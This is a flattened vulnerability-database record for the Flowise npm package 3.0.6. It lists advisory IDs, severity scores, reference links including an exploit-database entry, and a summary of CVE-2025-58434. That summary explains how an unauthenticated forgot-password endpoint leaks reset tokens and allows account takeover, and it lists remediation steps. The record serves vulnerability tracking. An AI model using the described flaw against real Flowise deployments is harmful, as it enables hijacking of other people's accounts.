vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-39aw-3gc6-bkgb
6
vulnerability VCID-3chx-dj2u-kbab
7
vulnerability VCID-3gp6-wwtd-kkf1
8
vulnerability VCID-488c-vrqu-f7hf
9
vulnerability VCID-5j9e-bcr5-n7bs
10
vulnerability VCID-5pup-kgaf-3ubw
11
vulnerability VCID-67mz-pfy4-ykep
12
vulnerability VCID-6ufs-d346-d7ev
13
vulnerability VCID-71uq-yx2j-cqak
14
vulnerability VCID-9bht-svq8-87b4
15
vulnerability VCID-9rqv-p7rz-5kar
16
vulnerability VCID-a1e4-f5dh-w3a5
17
vulnerability VCID-abyp-yn76-1yfp
18
vulnerability VCID-affy-v76q-fub6
19
vulnerability VCID-aqg8-6us7-uqef
20
vulnerability VCID-b97u-efzx-dffn
21
vulnerability VCID-bkmk-k9mn-ekhx
22
vulnerability VCID-cb6d-4c2v-w7c3
23
vulnerability VCID-cxja-9yxc-k7au
24
vulnerability VCID-d4wa-szeh-43ab
25
vulnerability VCID-dtss-epth-z7fh
26
vulnerability VCID-dzed-27rk-3qav
27
vulnerability VCID-e65e-s5sd-kuhp
28
vulnerability VCID-ejdc-j73x-jydk
29
vulnerability VCID-fu6t-9dk4-jbh9
30
vulnerability VCID-gt6n-beak-33gy
31
vulnerability VCID-gvpx-4wkw-43cz
32
vulnerability VCID-hdej-umwh-kqav
33
vulnerability VCID-hkfs-v3bp-kbh5
34
vulnerability VCID-j5hh-haj2-qydg
35
vulnerability VCID-jcze-eg2c-mkcf
36
vulnerability VCID-jmps-anck-eqdt
37
vulnerability VCID-k579-xd81-hqdu
38
vulnerability VCID-kpyg-gve3-b3av
39
vulnerability VCID-ksmv-s6c9-t7ap
40
vulnerability VCID-m3j3-4u39-euht
41
vulnerability VCID-pzza-9xq9-a7de
42
vulnerability VCID-qgs1-hazv-67b8
43
vulnerability VCID-qm89-q2ar-uyhy
44
vulnerability VCID-r74e-k86f-7qgb
45
vulnerability VCID-rgmv-6bqh-eqf2
46
vulnerability VCID-s3jg-wce1-fbf3
47
vulnerability VCID-tdm1-91mc-8kgr
48
vulnerability VCID-v1nz-wwsu-qycg
49
vulnerability VCID-v9hg-7pex-g3dp
50
vulnerability VCID-w9yr-5jbp-q7fm
51
vulnerability VCID-xt1d-efw7-g3c6
52
vulnerability VCID-ywgu-76cy-uqe7
53
vulnerability VCID-z1y2-f2ws-8ycb
54
vulnerability VCID-zwna-stj5-3yhm
55
vulnerability VCID-zwz7-byj4-6qan
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6
aliases CVE-2025-59528, GHSA-3gcm-f6qx-ff7p
risk_score 10.0
exploitability 2.0
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wt2v-e5sa-n3g8
7
url VCID-zbrd-qdty-2bfs
vulnerability_id VCID-zbrd-qdty-2bfs
summary Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5 and earlier, the `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO). This vulnerability applies to both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments that expose the same API. Commit 9e178d68873eb876073846433a596590d3d9c863 in version 3.0.6 secures password reset endpoints. Several recommended remediation steps are available. Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel. Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration. Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery). Apply the same fixes to both cloud and self-hosted/local deployments. Log and monitor password reset requests for suspicious activity. Consider multi-factor verification for sensitive accounts.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-58434
reference_id
reference_type
scores
0
value 0.32362
scoring_system epss
scoring_elements 0.96969
published_at 2026-06-12T12:55:00Z
1
value 0.32362
scoring_system epss
scoring_elements 0.96958
published_at 2026-06-11T12:55:00Z
2
value 0.32362
scoring_system epss
scoring_elements 0.9697
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-58434
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-58434
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-58434
2
reference_url https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863
reference_id 9e178d68873eb876073846433a596590d3d9c863
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-12T18:10:37Z/
url https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863
3
reference_url https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/typescript/webapps/52557.py
reference_id CVE-2025-58434
reference_type exploit
scores
url https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/typescript/webapps/52557.py
4
reference_url https://github.com/advisories/GHSA-wgpv-6j63-x5ph
reference_id GHSA-wgpv-6j63-x5ph
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-wgpv-6j63-x5ph
5
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph
reference_id GHSA-wgpv-6j63-x5ph
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-12T18:10:37Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph
fixed_packages
0
url pkg:npm/flowise@3.0.6
purl pkg:npm/flowise@3.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-39aw-3gc6-bkgb
6
vulnerability VCID-3chx-dj2u-kbab
7
vulnerability VCID-3gp6-wwtd-kkf1
8
vulnerability VCID-488c-vrqu-f7hf
9
vulnerability VCID-5j9e-bcr5-n7bs
10
vulnerability VCID-5pup-kgaf-3ubw
11
vulnerability VCID-67mz-pfy4-ykep
12
vulnerability VCID-6ufs-d346-d7ev
13
vulnerability VCID-71uq-yx2j-cqak
14
vulnerability VCID-9bht-svq8-87b4
15
vulnerability VCID-9rqv-p7rz-5kar
16
vulnerability VCID-a1e4-f5dh-w3a5
17
vulnerability VCID-abyp-yn76-1yfp
18
vulnerability VCID-affy-v76q-fub6
19
vulnerability VCID-aqg8-6us7-uqef
20
vulnerability VCID-b97u-efzx-dffn
21
vulnerability VCID-bkmk-k9mn-ekhx
22
vulnerability VCID-cb6d-4c2v-w7c3
23
vulnerability VCID-cxja-9yxc-k7au
24
vulnerability VCID-d4wa-szeh-43ab
25
vulnerability VCID-dtss-epth-z7fh
26
vulnerability VCID-dzed-27rk-3qav
27
vulnerability VCID-e65e-s5sd-kuhp
28
vulnerability VCID-ejdc-j73x-jydk
29
vulnerability VCID-fu6t-9dk4-jbh9
30
vulnerability VCID-gt6n-beak-33gy
31
vulnerability VCID-gvpx-4wkw-43cz
32
vulnerability VCID-hdej-umwh-kqav
33
vulnerability VCID-hkfs-v3bp-kbh5
34
vulnerability VCID-j5hh-haj2-qydg
35
vulnerability VCID-jcze-eg2c-mkcf
36
vulnerability VCID-jmps-anck-eqdt
37
vulnerability VCID-k579-xd81-hqdu
38
vulnerability VCID-kpyg-gve3-b3av
39
vulnerability VCID-ksmv-s6c9-t7ap
40
vulnerability VCID-m3j3-4u39-euht
41
vulnerability VCID-pzza-9xq9-a7de
42
vulnerability VCID-qgs1-hazv-67b8
43
vulnerability VCID-qm89-q2ar-uyhy
44
vulnerability VCID-r74e-k86f-7qgb
45
vulnerability VCID-rgmv-6bqh-eqf2
46
vulnerability VCID-s3jg-wce1-fbf3
47
vulnerability VCID-tdm1-91mc-8kgr
48
vulnerability VCID-v1nz-wwsu-qycg
49
vulnerability VCID-v9hg-7pex-g3dp
50
vulnerability VCID-w9yr-5jbp-q7fm
51
vulnerability VCID-xt1d-efw7-g3c6
52
vulnerability VCID-ywgu-76cy-uqe7
53
vulnerability VCID-z1y2-f2ws-8ycb
54
vulnerability VCID-zwna-stj5-3yhm
55
vulnerability VCID-zwz7-byj4-6qan
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6
aliases CVE-2025-58434, GHSA-wgpv-6j63-x5ph
risk_score 10.0
exploitability 2.0
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zbrd-qdty-2bfs
Risk_score4.5
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6